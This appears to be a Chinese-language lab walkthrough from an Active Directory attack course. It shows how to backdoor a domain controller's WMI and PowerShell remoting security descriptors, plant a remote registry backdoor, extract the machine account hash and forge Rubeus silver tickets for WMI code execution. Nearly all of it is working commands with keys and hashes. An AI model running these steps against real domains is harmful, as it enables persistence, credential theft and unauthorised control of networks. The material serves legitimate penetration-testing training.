任务
- 调整dcorp-dc安全描述符以不需要管理员可以使用Powershell remoting和WMI
- 从dcorp-dc不使用管理员权限拿到机器账号hash 并且理他区进行银票攻击以拿到WMI代码执行
任务1
C:\AD\Tools\Rubeus.exe asktgt /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt现在修改服务安全描述符使得可以不适用DA的管理员权限就可以使用服务
方法1
使用svcadmin权限执行
powershell
. C:\AD\Tools\RACE.ps1Set-RemoteWMI -SamAccountName student832 -ComputerName dcorp-dc -namespace 'root\cimv2' -Verbose
重新开启一个终端
powershell
gwmi -class win32_operatingsystem -ComputerName dcorp-dc
方法2
svcadmin权限下
Set-RemotePSRemoting -SamAccountName student832 -ComputerName dcorp-dc.dollarcorp.moneycorp.local -Verbose忽略I/O报错
开启新终端
Invoke-Command -ScriptBlock{$env:username} -ComputerName dcorp-dc.dollarcorp.moneycorp.local
任务2
在DA权限上
Add-RemoteRegBackdoor -ComputerName dcorp-dc -Trustee student832 -Verbose
已经添加
在本机上拿到hash
. C:\AD\Tools\RACE.ps1
Get-RemoteMachineAccountHash -ComputerName dcorp-dc -Verbose
46452b45958e2ea61774f0c34f5e7330
使用机器hash制作银票
为 HOST 和 RPCSS 创建银票,使用机器帐户哈希执行 WMI 查询
重新开启一个终端 注意rc4内容改成上面得到的机器账户hash
C:\AD\Tools\Rubeus.exe silver /service:HOST/dcorp-dc.dollarcorp.moneycorp.local /rc4:46452b45958e2ea61774f0c34f5e7330 /ldap /user:Administrator /domain:dollarcorp.moneycorp.local /ptt接着输入
C:\AD\Tools\Rubeus.exe silver /service:RPCSS/dcorp-dc.dollarcorp.moneycorp.local /rc4:46452b45958e2ea61774f0c34f5e7330 /ldap /user:Administrator /domain:dollarcorp.moneycorp.local /ptt再输入
gwmi -Class win32_operatingsystem -ComputerName dcorp-dc
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
